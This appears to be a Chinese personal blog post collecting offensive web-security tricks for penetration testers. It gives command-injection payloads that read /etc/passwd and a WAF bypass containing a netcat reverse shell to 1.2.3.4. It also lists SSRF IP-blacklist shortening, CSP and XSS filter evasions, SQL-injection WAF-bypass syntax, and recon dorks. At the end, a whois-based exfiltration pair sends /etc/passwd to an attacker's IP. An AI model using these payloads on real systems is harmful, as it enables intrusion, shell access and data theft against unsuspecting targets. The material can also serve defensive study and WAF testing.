Ethan's Blog

Some fun tips

字数统计: 484阅读时长: 2 min
2019/06/09 Share

题记

本系列是持续更新,主要是记录一些,比较小的tip,因为知识点碎,所以做成一个集合,想起来就写写!

命令执行tips

用echo的cat命令执行

原理就是借用echo重定向,来输出字符,使用反引号进行命令执行

1
cat `echo -n '/etc'|| echo '/shit'&& echo '/passwd'`

使用未初始化的Bash变量绕过基于WAF

其中$ U不存在,它会被视为由bash的一个空字符串

1
cat$u /etc$u/passwd$u

1
nc$u -e /bin$u/bash$u 1.2.3.4 1337

黑名单绕过

IP地址黑名单

通过去掉0来绕过SSRF或者重定向的黑名单

例子:

1
2
3
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
http://127.0.0.1 -> http://127.1

使用./绕过文件限制

CSP Bypass

如果CSP策略指向dir并且你使用%2f来编码/,则仍然认为它位于目录内

%2f..%2f

XSS WAF Bypass

1
on<>mouseover="ale<>rt()">

XSS cheat sheet

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

资产搜集

Bash简洁式

1
curl -sL http://index.commoncrawl.org | grep 'href="/CC'  |  awk -F'"' '{print $2}' | xargs -n1 -I{} curl -sL http://index.commoncrawl.org{}-index?url=http://uber.com* |  awk -F'"url":\ "' '{print $2}' | cut -d'"' -f1 | sort -u | tee domain.txt

好用的dork

1
2
3
4
site:*.site.com -www 
site:*.*.site.com -www
site:*.*.*.site.com -www
inurl:"http://att.com:8080"

重定向Bypass

SQL injection bypass waf

看到了很有趣的SQL注入绕过waf的tricks,所以记录下来。

1
2
3
4
5
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

更多例子:

不错参考资料

https://websec.ca/kb/sql_injection#MySQL_Fuzzing_Obfuscation

链接:https://pan.baidu.com/s/1E5NCGWtACdsy3YcCzznAcQ
提取码:jlo2

Fun discuss

whois for data

有时候有趣的探讨很有意思,看到一个关于数据窃取的方式讨论,具体是使用whois

1
2
攻击者: nc -l -v -p 53 | sed "s/ //g" | base64 -d
受害人: whois -h $attackerIP -p 53 cat /etc/passwd | base64

有人提出了其它用法,可以用于文件上传

CATALOG
  1. 1. 题记
  2. 2. 命令执行tips
    1. 2.1. 用echo的cat命令执行
    2. 2.2. 使用未初始化的Bash变量绕过基于WAF
  3. 3. 黑名单绕过
    1. 3.1. IP地址黑名单
    2. 3.2. 使用./绕过文件限制
    3. 3.3. CSP Bypass
  4. 4. XSS WAF Bypass
  5. 5. 资产搜集
    1. 5.1. Bash简洁式
    2. 5.2. 好用的dork
  6. 6. 重定向Bypass
  7. 7. SQL injection bypass waf
  8. 8. Fun discuss
    1. 8.1. whois for data